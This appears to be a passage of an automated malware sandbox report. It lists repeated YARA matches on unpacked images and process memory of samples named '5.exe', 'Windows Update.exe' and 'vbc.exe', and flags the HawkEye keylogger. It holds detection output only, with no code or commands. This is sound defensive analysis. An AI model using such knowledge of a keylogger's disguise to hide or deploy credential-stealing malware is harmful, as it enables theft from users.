          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4b3fa72.56.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4aadc72.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4aadc72.51.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4b3fa72.36.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a26c92.27.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a26c92.50.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a26c92.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a5dc92.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4aadc72.31.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.330182095.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.330884518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.329440107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1928, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1060, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5844, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 6244, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6716, type: MEMORYSTR
          Yara detected HawkEye KeyloggerShow sources
          Source: Yara matchFile source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a5dc92.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4aadc72.51.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.41ce65.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.46.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.34.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.53.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPE
